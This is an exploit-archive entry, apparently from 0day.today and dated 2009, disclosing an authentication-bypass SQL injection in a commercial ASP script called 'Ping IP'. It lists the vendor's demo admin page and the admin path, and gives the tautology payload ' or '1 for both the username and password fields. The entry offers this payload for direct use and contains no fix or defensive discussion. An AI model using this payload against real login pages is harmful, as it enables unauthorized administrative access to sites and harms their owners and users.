id: 4688
date: 01/16/2009
title: Ping IP (Auth Bypass) SQL Injection Vulnerability
author: ByALBAYX
cves: 

=================================================
Ping IP (Auth Bypass) SQL Injection Vulnerability
=================================================



#############################################
[~]Author   : ByALBAYX
#############################################
[~]Ping IP (Auth Bypass) SQL

[~]Script        : Ping IP

[~]Price         : $59   :) 

[~]Demo          : http://warhound.com/ASP/ping/admin.aspx

[~]Details       : http://warhound.com/asp/products.htm
#############################################
[~]Admin     :  [PATH] /ping/admin.aspx


[~]username  : ' or '1

[~]password  : ' or '1

 :) 
#############################################



#  0day.today [2023-03-23]  #